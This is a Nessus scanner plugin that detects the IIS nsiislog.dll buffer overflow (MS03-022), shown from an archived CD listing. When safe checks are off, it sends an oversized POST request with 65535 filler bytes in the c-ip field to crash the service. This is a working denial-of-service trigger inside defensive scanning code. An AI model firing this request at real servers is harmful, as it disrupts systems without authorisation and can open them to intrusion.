home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / nsiislog_dll.nasl < prev    next >
Text File  |  2005-01-14  |  3KB  |  107 lines
  2. # (C) Tenable Network Security
  3. #
  4. #
  5. # Supercedes MS03-019
  6.  
  7. if(description)
  8. {
  9.  script_id(11664);
  10.  script_bugtraq_id(7727, 8035);
  11.  script_version ("$Revision: 1.12 $");
  12.  script_cve_id("CAN-2003-0227", "CAN-2003-0349");
  13.  
  14.  name["english"] = "nsiislog.dll DoS";
  15.  
  16.   
  17.  script_name(english:name["english"]);
  18.  
  19.  desc["english"] = "
  20. Some versions of IIS shipped with a default file, nsiislog.dll, 
  21. within the /scripts directory.  Nessus has determined that the
  22. remote host has the file installed. 
  23.  
  24. The NSIISLOG.dll CGI may allow an attacker to execute
  25. arbitrary commands on this host, through a buffer overflow.
  26.  
  27. Solution : http://www.microsoft.com/technet/security/bulletin/ms03-022.mspx
  28.  
  29. Risk factor : High";
  30.  
  31.  
  32.  script_description(english:desc["english"]);
  33.  
  34.  summary["english"] = "Determines the presence of nsiislog.dll";
  35.  
  36.  
  37.  script_summary(english:summary["english"]);
  38.  
  39.  script_category(ACT_MIXED_ATTACK);
  40.  
  41.  
  42.  script_copyright(english:"This script is Copyright (C) 2003 Tenable Network Security");
  43.  
  44.  family["english"] = "CGI abuses";
  45.  family["francais"] = "Abus de CGI";
  46.  
  47.  script_family(english:family["english"], francais:family["francais"]);
  48.  
  49.  script_dependencie("find_service.nes", "http_version.nasl", "www_fingerprinting_hmap.nasl");
  50.  script_require_ports("Services/www", 80);
  51.  exit(0);
  52. }
  53.  
  54. #
  55. # The script code starts here
  56. #
  57.  
  58. include("http_func.inc");
  59. include("http_keepalive.inc");
  60.  
  61. port = get_http_port(default:80);
  62.  
  63. sig = get_kb_item("www/hmap/" + port + "/description");
  64. if ( sig && "IIS" >!< sig ) exit(0);
  65.  
  66. req  = http_get(item:"/scripts/nsiislog.dll", port:port);
  67. res  = http_keepalive_send_recv(port:port, data:req);
  68. if("NetShow ISAPI Log Dll" >< res)
  69. {
  70.  if(safe_checks()) {
  71.    security_hole(port);
  72.    exit(0);
  73.    }
  74.   
  75.   
  76.   all = make_list("date", "time", "c-dns", "cs-uri-stem", "c-starttime", 
  77.             "x-duration", "c-rate", "c-status", "c-playerid",
  78.           "c-playerversion", "c-player-language", "cs(User-Agent)",
  79.           "cs(Referer)", "c-hostexe");
  80.           
  81.   poison = NULL;
  82.   
  83.   foreach var (all)
  84.   {
  85.    poison += var + "=Nessus&";
  86.   }         
  87.    
  88.   poison += "c-ip=" + crap(65535);
  89.   
  90.   req = string("POST /scripts/nsiislog.dll HTTP/1.1\r\n",
  91. "Host: ", get_host_name(), "\r\n",
  92. "User-Agent: NSPlayer/2.0\r\n",
  93. "Content-Type: application/x-www-form-urlencoded\r\n",
  94. "Content-Length: ", strlen(poison), "\r\n\r\n") + poison;
  95.  
  96.  soc = http_open_socket(port);
  97.  if(!soc)exit(0);
  98.  send(socket:soc, data:req);
  99.  r = http_recv(socket:soc);
  100.  
  101.  # 2nd match fails on localized Windows
  102.  if("HTTP/1.1 500 Server Error" >< r &&
  103.     ("The remote procedure call failed. " >< r ||
  104.      "<html><head><title>Error</title>" >< r))
  105.   security_hole(port);
  106. }
  107.